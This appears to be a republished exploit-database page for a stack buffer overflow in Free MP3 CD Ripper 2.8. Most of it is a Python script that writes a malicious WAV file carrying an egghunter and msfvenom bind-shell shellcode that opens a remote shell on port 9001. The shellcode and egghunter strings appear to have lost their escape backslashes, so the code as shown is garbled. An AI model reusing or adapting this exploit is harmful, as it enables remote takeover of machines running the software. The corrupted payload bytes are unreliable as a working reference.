Exploit/Advisories

Published on July 30th, 2020 📆 | 6823 Views ⚑

Free MP3 CD Ripper 2.8 Buffer Overflow ≈ Packet Storm

# Exploit Title: Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)
# Date: 2020-07-22
# Exploit Author: Eduard Palisek
# Vendor Homepage: https://www.cleanersoft.com
# Software Link: https://www.cleanersoft.com/download/FMCRSetup.exe
# Version: 2.8 Build 20140611
# Tested on: [Windows XP, Professional, Version 2002, SP 3
#!/usr/bin/python
file = open("exploit.wav", "wb")

# msfvenom -p windows/shell_bind_tcp LPORT=9001 -a x86 EXITFUNC=thread -e x86/shikata_ga_nai -b "x00x0ax0d" -f python -v shellcode_bind

shellcode_bind = b""
shellcode_bind += b"xb8x88xbfxa2x65xdbxd6xd9x74x24"
shellcode_bind += b"xf4x5ax2bxc9xb1x53x83xc2x04x31"
shellcode_bind += b"x42x0ex03xcaxb1x40x90x36x25x06"
shellcode_bind += b"x5bxc6xb6x67xd5x23x87xa7x81x20"
shellcode_bind += b"xb8x17xc1x64x35xd3x87x9cxcex91"
shellcode_bind += b"x0fx93x67x1fx76x9ax78x0cx4axbd"
shellcode_bind += b"xfax4fx9fx1dxc2x9fxd2x5cx03xfd"
shellcode_bind += b"x1fx0cxdcx89xb2xa0x69xc7x0ex4b"
shellcode_bind += b"x21xc9x16xa8xf2xe8x37x7fx88xb2"
shellcode_bind += b"x97x7ex5dxcfx91x98x82xeax68x13"
shellcode_bind += b"x70x80x6axf5x48x69xc0x38x65x98"
shellcode_bind += b"x18x7dx42x43x6fx77xb0xfex68x4c"
shellcode_bind += b"xcax24xfcx56x6cxaexa6xb2x8cx63"
shellcode_bind += b"x30x31x82xc8x36x1dx87xcfx9bx16"
shellcode_bind += b"xb3x44x1axf8x35x1ex39xdcx1exc4"
shellcode_bind += b"x20x45xfbxabx5dx95xa4x14xf8xde"
shellcode_bind += b"x49x40x71xbdx05xa5xb8x3dxd6xa1"
shellcode_bind += b"xcbx4exe4x6ex60xd8x44xe6xaex1f"
shellcode_bind += b"xaaxddx17x8fx55xdex67x86x91x8a"
shellcode_bind += b"x37xb0x30xb3xd3x40xbcx66x49x48"
shellcode_bind += b"x1bxd9x6cxb5xdbx89x30x15xb4xc3"
shellcode_bind += b"xbex4axa4xebx14xe3x4dx16x97x28"
shellcode_bind += b"xa7x9fx71x44xa7xc9x2axf0x05x2e"
shellcode_bind += b"xe3x67x75x04x5bx0fx3ex4ex5cx30"
shellcode_bind += b"xbfx44xcaxa6x34x8bxcexd7x4ax86"
shellcode_bind += b"x66x80xddx5cxe7xe3x7cx60x22x93"
shellcode_bind += b"x1dxf3xa9x63x6bxe8x65x34x3cxde"
shellcode_bind += b"x7fxd0xd0x79xd6xc6x28x1fx11x42"
shellcode_bind += b"xf7xdcx9cx4bx7ax58xbbx5bx42x61"
shellcode_bind += b"x87x0fx1ax34x51xf9xdcxeex13x53"
shellcode_bind += b"xb7x5dxfax33x4exaex3dx45x4fxfb"
shellcode_bind += b"xcbxa9xfex52x8axd6xcfx32x1axaf"
shellcode_bind += b"x2dxa3xe5x7axf6xc3x07xaex03x6c"
shellcode_bind += b"x9ex3bxaexf1x21x96xedx0fxa2x12"
shellcode_bind += b"x8exebxbax57x8bxb0x7cx84xe1xa9"
shellcode_bind += b"xe8xaax56xc9x38"

egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x57x30x30x54x8bxfaxafx75xeaxafx75xe7xffxe7"

nops = "x90" * 30
junk1 = "A" * 2112
tag = "W00TW00T"
junk2 = "B" * (2000-len(shellcode_bind+nops+tag))
eip = "x53x93x42x7e" # 0x7e429353 : jmp esp in user32.dll

buffer = junk1 + tag + nops + shellcode_bind + junk2 + eip + nops + egghunter

file.write(buffer)
file.close()

Source link

Tagged with: advisory • buffer • CSRF • exploit • free • MP3 • overflow • packet • ripper • scanner • security • storm • vulnerability • whitepaper • XSS

Comments are closed.

Free MP3 CD Ripper 2.8 Buffer Overflow ≈ Packet Storm

🌟 Your Account

🔔 Email Subscriptions

Get new posts by email

Donate Via Wallets

Popular

Gloss

☕️Social Media

👥Members

🌍 Forum Groups